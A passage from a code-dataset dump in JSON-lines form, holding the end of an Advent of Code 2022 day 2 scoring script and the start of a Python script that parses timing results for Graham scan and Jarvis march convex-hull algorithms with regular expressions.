0\nscoreStep2 = 0\n\nfor line in fileLines:\n inputA,inputB = line.split()[0], line.split()[1]\n scoreStep1 += veryBadList[ord(inputA) - 65].index(inputB) * 3 + ord(inputB) - 87\n scoreStep2 += (3 * (ord(inputB) - 88)) + ord(veryBadList[ord(inputA) - 65][ord(inputB) - 88]) - 87\n\nprint(scoreStep1)\nprint(scoreStep2)","repo_name":"leifkemp-bjss/aoc-2022","sub_path":"day2/day2-alternate.py","file_name":"day2-alternate.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22611766657","text":"import re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport argparse\nimport sys\n\nnum_pattern = r'[-]?\\d+(\\.\\d+)?([e][\\+\\-]\\d+)?'\n\nbase = \"results\"\n\nfilenames = [\n \"graham_scan_increasing_points.csv\",\n \"jarvis_time_increasing_points.csv\",\n \"graham_time_vertices.csv\",\n \"jarvis_time_vertices.csv\"\n]\n\nfor i in range(len(filenames)):\n filenames[i] = os.path.join(base, filenames[i])\n\n\ndef _check_pattern(line, pattern):\n \"\"\"\n Checks that line matches the iss_pattern. Returns True if it does\n and also adds info about if it is a commentary or not.\n Returns False otherwise\n \"\"\"\n r = re.match(pattern, line)\n if r:\n return r.groupdict()\n else:\n return False\n\n\ndef is_point_time(line):\n \"\"\"\n \"\"\"\n constant_pattern = r'(?P\\d+)[,]?\\s+(?P\\d+)[,]?\\s+(?P